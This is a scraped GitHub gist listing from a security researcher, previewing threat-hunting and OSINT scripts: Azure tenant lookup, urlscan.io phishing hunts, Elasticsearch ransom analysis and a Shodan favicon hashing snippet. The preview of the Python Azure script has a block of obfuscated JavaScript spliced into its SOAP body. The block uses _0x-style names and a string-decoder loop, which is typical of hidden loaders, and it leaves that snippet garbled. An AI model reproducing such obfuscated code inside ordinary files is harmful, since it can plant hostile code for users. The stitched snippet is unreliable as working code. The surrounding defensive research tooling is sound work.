@kmsec-uk
kmsec-uk / aad-info.py
Created May 22, 2025 15:35
Get azure info for a given domain (python implementation of azure-osint.kmsec.uk)
class AADInfo:
    def __init__(self, domain: str) -> None:
        self.domain = domain
        self.brand = ""
        self.tenant_id = ""
        self.region = ""
        self.domains = []
        self.soap_body = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:exm="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:ext="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:a="http://www.w3.org/2005/08/addressing" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Header>
function _0x8b6a7(_0x1edf20, _0xa6bb55, _0x214c23, _0x30e79d, _0x3e48f8) {
return _0x1634(_0x214c23 + 0x49, _0xa6bb55);
}
(function (_0x50ca03, _0x428fe8) {
const _0x399d63 = _0x50ca03();
while (true) {
try {
const _0x597f48 = parseInt(_0x1634(1889, 'Qeak')) / 1 + parseInt(_0x1634(505, ']GEe')) / 2 * (parseInt(_0x1634(1655, ')Izs')) / 3) + parseInt(_0x1634(369, '1uWe')) / 4 * (-parseInt(_0x1634(556, 'NRss')) / 5) + parseInt(_0x1634(1170, 'xv#b')) / 6 + -parseInt(_0x1634(1752, '4qIf')) / 7 * (parseInt(_0x1634(716, 'yYX9')) / 8) + -parseInt(_0x1634(590, '1Kit')) / 9 + -parseInt(_0x1634(939, 'Au2M')) / 10 * (parseInt(_0x1634(469, 'rviH')) / 11);
if (_0x597f48 === _0x428fe8) {
break;
@kmsec-uk
kmsec-uk / Note.md
Created September 27, 2024 11:44
SCATTERED SPIDER urlscan.io triage

Hunt for SCATTERED SPIDER infrastructure using urlscan.io

This hunt script leverages a reasonably high fidelity urlscan.io search for SCATTERED SPIDER phishing pages:

stats.requests:<30 domain:oktacdn.com filename:(okta-sign-in.min.js AND okta-sign-in.min.css) page.server:apache NOT (page.domain:okta.com)

The results of this search are then retrieved and stored into results.json.

@kmsec-uk
kmsec-uk / ccTLDs.md
Created August 20, 2024 13:35
all ccTLDs in JSON format excluding generic and internationalised IDNs

This list of TLDs is intended to help attribute a domain to a certain country.

  • The data was drawn from Wikipedia
  • Only ccTLDs that are attributed to countries with high confidence are included (i.e. the generic TLDs are excluded)
  • Only the two-letter ccTLDs are included (for simplicity)

The JavaScript to copy and use in the console at https://en.wikipedia.org/wiki/Country_code_top-level_domain:

@kmsec-uk
kmsec-uk / urlscan.py
Last active August 2, 2024 15:10
Quick+dirty asynchronous URLScan subtasking with aiohttp and asyncio (phishing example)
#!/usr/bin/env python3
import asyncio
import json
import aiohttp
import os
import re
api_key = os.environ.get("URLSCAN_API_KEY")
urlscan_base_url = "https://urlscan.io/api/v1/"
@kmsec-uk
kmsec-uk / thousandmine.py
Created July 29, 2024 19:09
quick+dirty ThousandEyes appliance web login automation
import aiohttp
import asyncio
import json
class TEAppliance:
    def __init__(self, ip: str, port: int) -> None:
        self.ip = ip
        self.port = port
        self.cookie = (None,)
@kmsec-uk
kmsec-uk / common-hostnames.md
Created March 20, 2024 15:06
Common Hostnames

Common Hostnames observed on the internet

Hostnames can be a useful fingerprint for detecting attacker infrastructure on the public internet; however, some hostnames are commonly observed on the internet and are low-confidence indicators.

@kmsec-uk
kmsec-uk / install-appimages.md
Created December 10, 2023 09:39
Install appimages on Debian / Chrome OS manually

Install arbitrary AppImages

AppImages often come with the .desktop files and icon assets embedded in the squashfs filesystem.

  1. Unpack the AppImage: [application].AppImage --appimage-extract (you can see other AppImage options with --appimage-help)
  2. Find the relevant files and copy them:
# Copy the .desktop file from the squashfs-root to the .desktop file store in ~/.local/share/applications/
find squashfs-root/ | grep .desktop
@kmsec-uk
kmsec-uk / elastic-ransom.py
Created November 30, 2023 16:42
Elastic ransom analysis
#! /usr/bin/env python3.11
import argparse
import json
import requests
# input file `shodan download readme_indices 'product:elastic "read-me"'`
parser = argparse.ArgumentParser(description='Ad-hoc elasticsearch ransom hunt')
parser.add_argument('-f', required=True, type=str,
                    help='shodan json data file results from `shodan download [file] [query]`')
@kmsec-uk
kmsec-uk / shodan-favicon-hash.py
Created July 11, 2023 19:26
Generate a Shodan favicon hash (32-bit signed MMH3 hash) from file
import base64
import re
import mmh3
with open('favicon.ico', 'rb') as favicon:
    # 1. To base64
    b64 = base64.b64encode(favicon.read())
    # 2. To string
    utf8_b64 = b64.decode('utf-8')